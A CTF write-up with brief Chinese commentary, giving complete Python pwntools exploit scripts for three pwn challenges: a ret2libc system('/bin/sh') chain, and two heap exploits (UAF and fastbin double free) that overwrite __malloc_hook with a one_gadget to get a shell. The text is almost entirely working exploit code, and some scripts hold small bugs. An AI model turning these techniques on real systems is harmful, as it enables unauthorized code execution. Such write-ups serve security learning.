pwn2

题目&&分析

ret2libc

exp

#!/usr/bin/env python2
#coding = utf8

import sys
from pwn import *

context.log_level = 'debug'
#context.terminal = ['gnome-terminal','-x','bash','-c']

# Any command-line argument selects the remote target; no argument means local.
local = 0 if len(sys.argv) > 1 else 1

# Only the I/O tube differs per mode; binary and libc paths are the same in both.
if local:
    sh = process('Emachine')
else:
    sh = remote('172.29.32.110', '8888')
elf = ELF('Emachine')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')


def en(enc):
    """Byte-reverse the low 8 bytes of ``enc``, XOR-ing ASCII digit bytes with 0xf.

    The eight least-significant bytes of ``enc`` are pulled out little-endian
    (lowest byte first).  Every byte strictly between 47 and 57 (ASCII '0'..'8';
    note '9' is excluded) is XOR-ed with 0xf.  The bytes are then re-packed with
    the first-extracted byte as the most significant, so the result is the
    byte-reversed input.  The extracted byte list is printed as a side effect.

    The original also had two ``elif`` branches (``x <= 64 and x > 90`` and
    ``x <= 96 and x > 122``) that can never be true; they are omitted here.
    Unused by the script below (the call is commented out).
    """
    low_bytes = []
    for _ in range(8):
        low = enc % 0x100
        enc = (enc - low) // 0x100
        low_bytes.append(low)

    packed = 0
    for b in low_bytes:
        if 47 < b < 57:
            b ^= 0xf
        packed = packed * 0x100 + b
    print(low_bytes)
    return packed

# Fixed addresses read out of this exact build of the challenge binary
# (hard-coded text addresses — presumably a non-PIE binary; confirm with checksec).
pop_rdi = 0x0000000000400c83
#main = 0x400b28
start = 0x400790
# Stage 1: choose option 1, overflow with 0x50 bytes of filler plus 8 more before the
# chain, have puts() print its own GOT entry, then return to start for another round.
sh.sendlineafter("Input your choice!\n",'1')
pay = 'a'*0x50+'bbbbbbbb'+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.symbols['puts'])+p64(start)
sh.sendline(pay)
# Skip the program's own output up to the leaked line.  puts() stops at the first
# zero byte, so the address comes back shorter than 8 bytes and is padded for u64().
sh.recvuntil('oooooooo')
sh.recvuntil('\n')
leak = u64(sh.recvuntil('\n',drop=True).ljust(8,'\x00'))
#print hex(e)
#leak =en(e)
print hex(leak)
# Rebase libc symbols from the leaked puts address.  The offsets come from the libc
# loaded above, so this is only right when it is the same build as the target's libc.
system = leak - libc.symbols['puts'] +libc.symbols['system']
#environ = leak - libc.symbols['puts'] +libc.symbols['environ']
read = leak - libc.symbols['puts'] +libc.symbols['read']  # only used by the commented-out read() variant below
print hex(system)
print hex(read)
#gdb.attach(sh)
# Stage 2: drain pending output, pick option 1 again, and call gets() with 0x6020a8
# (presumably a writable address inside the binary — confirm) as its buffer, so the
# line sent right after the payload is stored there.
sh.recv()
sh.sendline('1')
pop_rsi_r15 = 0x0000000000400c81  # unused; belonged to the read()-based payload below
#pay = 'a'*0x50+'bbbbbbbb'+p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)+p64(0x602080)+p64(0)+p64(read)+p64(start)
pay = 'a'*0x50+'bbbbbbbb'+p64(pop_rdi)+p64(0x6020a8)+p64(elf.symbols['gets'])+p64(start)
sh.sendline(pay)
sh.sendline('/bin/sh\x00')

# Stage 3: the same overflow once more, this time calling system() on the string
# written in stage 2.  Note: this uses send() where the earlier stages used
# sendline(); kept as in the original.
sh.recv()
sh.sendline('1')
#gdb.attach(sh)
pay = 'a'*0x50+'bbbbbbbb'+p64(pop_rdi)+p64(0x6020a8)+p64(system)+p64(start)
sh.send(pay)


sh.interactive()

pwn3

当时没看，血亏。

题目&&分析

溢出 + UAF 漏洞

exp

#!/usr/bin/env python2
#coding = utf8

import sys
from pwn import *

context.log_level = 'debug'
#context.terminal = ['gnome-terminal','-x','bash','-c']

# Any command-line argument selects the remote target; no argument means local.
local = 0 if len(sys.argv) > 1 else 1

if local:
    sh = process('./pwn')
    elf_path, libc_path = './pwn', '/lib/x86_64-linux-gnu/libc-2.23.so'
else:
    # Host and port were left empty in the write-up; remote('', '') will not
    # connect until they are filled in.
    sh = remote('','')
    elf_path, libc_path = 'pwn', 'libc.so.6'
elf = ELF(elf_path)
libc = ELF(libc_path)


def create(size, name):
    """Menu option 1: allocate a weapon of ``size`` bytes and send ``name`` as its contents.

    ``name`` goes out raw (sendafter, no newline appended), so the caller decides
    whether a terminating newline is part of the data.
    """
    ask = sh.sendlineafter
    ask("Command: \n", "1")
    ask("size: \n", str(size))
    sh.sendafter("name: \n", name)


def show(index):
    """Menu option 2: display the weapon stored at ``index``."""
    for prompt, reply in (("Command: \n", '2'), ('index: \n', str(index))):
        sh.sendlineafter(prompt, reply)

def dele(index):
    """Menu option 3: delete the weapon at ``index`` (the prompt reads 'weapon:')."""
    choice = '3'
    sh.sendlineafter("Command: \n", choice)
    sh.sendlineafter('weapon:\n', str(index))


def backdoor(index):
    """Menu option 666 (named 'backdoor' by the author), taking a weapon index.

    Not called anywhere in the script below.
    """
    target = str(index)
    sh.sendlineafter("Command: \n", '666')
    sh.sendlineafter("weapon:\n", target)


# Four initial chunks; the last one's contents carry fake size fields (0x110 / 0x41)
# used by the later heap stage.
create(0x100,'a\n')
create(0x60,'b\n')
create(0x60,'c\n')
create(0x60,'a'*0x10+p64(0x110)+p64(0x41)+'\n')
# Free index 0 and show it anyway: the freed entry is still displayed (the UAF from
# the write-up), and the number after "attack_times: " is treated as a libc pointer.
dele(0)
show(0)
sh.recvuntil("attack_times: ")
# 0x3c4b78 is that pointer's offset inside this libc-2.23 build; any other libc
# needs a different value.  libc.base is a plain attribute set here, not pwntools'
# ELF.address, so libc.symbols[...] stay unrebased and the base is added by hand.
libc.base = int(sh.recvuntil("\n",drop=True))-0x3c4b78
print hex(libc.base)
malloc_hook = libc.base+libc.symbols['__malloc_hook']#0x3c4b00
print hex(malloc_hook)
# one_gadget offset for this libc-2.23 build; the trailing comment keeps the alternative.
one_gadget = libc.base+0xf02a4#0x4526a

# Heap stage.  Note this create() sends no trailing '\n', unlike every other call:
# create() sends contents raw, so exactly 0x100 bytes are written here.
create(0x100,'a'*0xf0+p64(0x110)+p64(0x111))
dele(2)
dele(1)
# Writes a 0x71 size field followed by a pointer just below __malloc_hook.
create(0x100,'a'*0x58+p64(0x71)+p64(malloc_hook-0x23)+'\n')
create(0x60,'b\n')
# Final allocation: its contents place one_gadget in the chunk whose address was
# set to malloc_hook-0x23 above.
create(0x60,'aaa'+p64(one_gadget)+'\n')
#dele(7)
#create(0x4f,'\n')

#gdb.attach(sh)
sh.interactive()

pwn5

没注意到一个煞笔漏洞，被忽悠得以为有 size 检测，把好好的一道送分题送了。

题目&&分析

开局可以泄露 libc 地址：本来用的是 fmt（格式化字符串），结果可以直接泄露。之后利用 UAF。

exp

from pwn import *


sh = process("./pwn")
#sh = remote("172.29.21.114", 8888)
# todo check libc version
# checksec=False only suppresses the security-property printout; the hard-coded
# offsets in this script (0x6fdbd below, 0xf1147 later) are presumably specific to
# this libc-2.23 file either way.
libc = ELF("libc-2.23.so", checksec = False)


# The name is exactly 8 bytes with no terminator.  After the echoed "ab", the next
# 6 bytes are read back as a pointer (the "direct leak" from the write-up) and
# rebased with the hard-coded 0x6fdbd offset; the rest of the script uses `addr`
# as the libc base.
sh.sendafter("name?","a"*7+"b")
sh.recvuntil("ab")
addr = u64(sh.recv(6) +"\x00"*2)-0x6fdbd
print(hex(addr))
sh.sendlineafter("ID.","123")

def add(size, content):
    """Menu option 1: add a story of ``size`` bytes, then send ``content`` raw (no newline)."""
    reply = sh.sendlineafter
    reply("choice:", "1")
    reply("story:", str(size))
    sh.sendafter("story", content)

def remove(index):
    """Menu option 4: remove the story at ``index``."""
    for prompt, answer in (("choice:", "4"), ("dex:", str(index))):
        sh.sendlineafter(prompt, answer)



# Two chunks of the same size, then remove 0, 1, 0.  The second remove(0) is
# presumably accepted because the freed slot is not invalidated (the UAF from
# the write-up).
add(0x68, "123")
add(0x68, "123")
remove(0)
remove(1)
remove(0)

# The next allocation's contents are a pointer 35 bytes below __malloc_hook; two
# more allocations of the same size follow, and the fourth carries the one_gadget
# address.
add(0x68, p64(addr+libc.symbols["__malloc_hook"]-35))
add(0x68,"aaa")
add(0x68,"bbb")
# 0xf1147 (and 0xf02a4 in the trailing comment) are one_gadget offsets for this
# libc-2.23 build only.
add(0x68,"a"*19+p64(addr+0xf1147))#0xf02a4))

#add(0x10,'a')
#remove(0)
#remove(0)
# NOTE(review): `p` is never defined in this script (the tube is `sh`), so this
# line raises NameError before interactive() is reached — presumably a leftover
# debug line.
gdb.attach(p)
sh.interactive()